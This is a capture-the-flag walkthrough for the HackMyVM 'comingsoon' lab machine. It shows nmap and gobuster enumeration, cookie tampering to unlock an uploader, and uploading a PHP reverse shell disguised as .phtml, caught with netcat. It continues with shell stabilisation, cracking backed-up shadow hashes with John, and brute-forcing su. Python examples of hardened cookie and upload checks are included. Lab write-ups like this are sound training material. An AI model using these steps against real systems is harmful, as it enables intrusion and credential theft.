
Hackmyvm Comingsoon

The free CTF challenge site “hackmyvm.eu” has another easy-level VM called ‘comingsoon‘ for us to download, enumerate and get some flags from. This was another interesting one from them, with one step that I found challenging. In this write-up I describe my method and thought process for completing the hackmyvm comingsoon CTF challenge.

Setup for hackmyvm comingsoon

The VM can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.

My network:

  • 192.168.186.150 – This is my BlackArch enumeration system.
  • 192.168.186.12 – This is the Comingsoon vm.

For enumeration of the hackmyvm comingsoon challenge I will be using the BlackArch system build that I created in a previous blog post. You can use Kali, BlackArch, Parrot or just a standard Linux install to follow along.

Enumeration

nmap

The first command to run is nmap, for network service enumeration.

nmap -T5 -F -sV -sC 192.168.186.12

[Screenshot: nmap output]

There is an Apache server running on port 80 and SSH on port 22.

gobuster

Using gobuster we can find some interesting files and directories.

gobuster dir -w /usr/share/dirb/wordlists/common.txt \
-u http://192.168.186.12 -x txt,php,html | grep 200

[Screenshot: gobuster output]

“notes.txt” looks interesting so let’s remember it.

Web Crawling

As the “http” port 80 is open, let’s take a look in “firefox”.

First there is the notes.txt file that we came across with gobuster; we can open it in “firefox“.

[Screenshot: note.txt]

Interesting, it implies that there are backups somewhere, so let’s keep this in mind as well.

Let’s look at the main web page.

[Screenshot: the web page on port 80]

Nothing much there, so let’s look at the source code.

[Screenshot: HTML source]

Interesting, EnableUploader looks like a header. We can reload the page through Burp Suite to see it.

[Screenshot: Burp Proxy]

There is an encoded cookie, and it can be decoded in Burp Suite.

[Screenshot: Burp Decoder]

So it’s “base64” encoded and has our “EnableUploader” header set to “false”. If you are using Burp Proxy, the cookie can be modified so it reads “true” instead of “false”, and then the page reloaded.

[Screenshot: Burp Proxy with the modified cookie]

Inside the decoder type the word “true” and encode it as base64. Then replace the section after the “=” with this new string and forward the request from Burp Suite.
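As an added illustration (not code from this write-up or from the VM), the Python below contrasts the trust-the-cookie check that this step abuses with a server-side check that binds the flag to an HMAC. The cookie value, the `EnableUploader=false` payload layout and all function names are assumptions.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed cookie value modelled on the one seen in the Burp decoder:
# base64 of "EnableUploader=false" (assumption, not the VM's exact bytes).
WEAK_COOKIE = base64.b64encode(b"EnableUploader=false").decode()

def _decode(cookie_value: str):
    try:
        return base64.b64decode(cookie_value, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None

def uploader_enabled_weak(cookie_value: str) -> bool:
    """The VM's pattern: the flag lives in a client-controlled cookie,
    so anyone who re-encodes 'true' turns the uploader on."""
    decoded = _decode(cookie_value)
    if decoded is None:
        return False
    key, _, value = decoded.partition("=")
    return key == "EnableUploader" and value == "true"

def tamper(cookie_value: str) -> str:
    """Reproduce the Burp step above: decode, flip false -> true, re-encode."""
    decoded = base64.b64decode(cookie_value).decode()
    return base64.b64encode(decoded.replace("false", "true").encode()).decode()

# Hardened variant: the payload is bound to a server-held secret with an HMAC,
# so a tampered payload fails verification whatever it says.
SERVER_SECRET = secrets.token_bytes(32)  # would come from server config

def sign_flag(payload: str, secret: bytes = SERVER_SECRET) -> str:
    mac = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{payload}|{mac}".encode()).decode()

def uploader_enabled_signed(cookie_value: str, secret: bytes = SERVER_SECRET) -> bool:
    decoded = _decode(cookie_value)
    if decoded is None:
        return False
    payload, sep, mac = decoded.rpartition("|")
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not sep or not hmac.compare_digest(mac.encode(), expected.encode()):
        return False
    key, _, value = payload.partition("=")
    return key == "EnableUploader" and value == "true"
```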

[Screenshot: the new upload button]

Now there is a new upload link. With this upload link a PHP reverse shell can be uploaded. For this, the pentestmonkey reverse shell PHP script works perfectly. The IP address and the port need to be modified inside this script. The port can be left at the default of 1234.

It seems the uploader does not like .php files, so rename the script so it has a “.phtml” extension, in this case “go.phtml”.

This worked a treat.

[Screenshot: uploader]
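The extension trick above works because the uploader blocks only what it has been told to block. As an added example (Python rather than the VM's PHP, and not the VM's own code), here is a deny-list check of the kind that lets “go.phtml” through, next to an allow-list check that also inspects the file header. The accepted types and the function names are assumptions.

```python
from pathlib import PurePosixPath

# Deny-list, the behaviour the VM's uploader appears to have: only ".php" is
# refused, so "go.phtml" passes and Apache still routes it to the PHP handler.
DENIED = {".php"}

def allowed_by_denylist(filename: str) -> bool:
    return PurePosixPath(filename).suffix.lower() not in DENIED

# Allow-list: accept only the image types /assets/img/ is meant to hold, reject
# double extensions, path components and NUL bytes, and verify the file header.
ALLOWED = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def allowed_by_allowlist(filename: str) -> bool:
    path = PurePosixPath(filename)
    if path.name != filename or "\x00" in filename:
        return False
    suffixes = [s.lower() for s in path.suffixes]
    return len(suffixes) == 1 and suffixes[0] in ALLOWED

def accept_upload(filename: str, head: bytes) -> bool:
    """Decide on the name and on the first bytes of the uploaded content."""
    if not allowed_by_allowlist(filename):
        return False
    return head.startswith(MAGIC[PurePosixPath(filename).suffix.lower()])
```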

Reverse Shell

The uploader put the PHP script into the “/assets/img/” folder. Using a combination of “curl” and “netcat” a reverse shell can be spawned.

On the enumeration host, run a netcat listener on the same port you put into the reverse shell script. In one terminal run

nc -nvlp 1234

And in the other (change the IP to match your target):

curl "http://192.168.186.12/assets/img/go.phtml"

[Screenshot: reverse shell]

All going well, this spawns a reverse shell, but it needs to be stabilized with the commands below.

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
<CTRL + Z>
stty raw -echo; fg

[Screenshot: stabilized reverse shell]

Backup files

From the “note.txt” file we found earlier it can be safely assumed there is some sort of backup on the system, so let’s search for any backup files.

find / -name 'backup*' 2>/dev/null

[Screenshot: find result]

There is a backup file, so let’s copy it to our enumeration machine.

In the reverse shell window type

cd /var/backups
python3 -m http.server

Download the file locally and unzip it. Inside the backup archive there is a copy of the shadow and passwd files.

[Screenshot: backup file contents]

Using the unshadow command we can combine them into a crackable password hash file and brute force it with John the Ripper.

unshadow passwd shadow > ./unshadow
john --wordlist=/opt/rockyou.txt ./unshadow --format=crypt

[Screenshot: john output]

Comingsoon User.txt

Now that the password is available, “su -” to scpuser is possible. Once we have access to the scpuser home directory there are some interesting files to look at: first user.txt, which contains the CTF user flag, and second a file called .oldpasswords.

[Screenshot: scpuser home directory files]

Comingsoon oldpasswords

Take a look at the .oldpasswords file.

[Screenshot: .oldpasswords]

The previous root passwords were all popular animated movies. Let’s try to brute force the root password against the top 100 animated movies.

Before we do the brute force we need to prepare a list of movies:

  • Grab a list of the top 100 animated movies from the internet.
  • Keep the case and remove the spaces.
  • Such a list already exists, ready made, on my GitHub page.
  • su – can be quite slow to brute force as there is a 5 second gap between tries. You can use my “verify su” script to automate this process.

Once the list is created it can be used to brute force the “su -” password. This can either be done manually or via my Python script.

Manually,

su -
password:

Or with my script.

[Screenshot: root.txt]

The previous steps should give you the root password, and from there you can run “su -“. Input the password and you have root access.


Conclusion

This was an interesting room because it gave me some challenge with the password list.
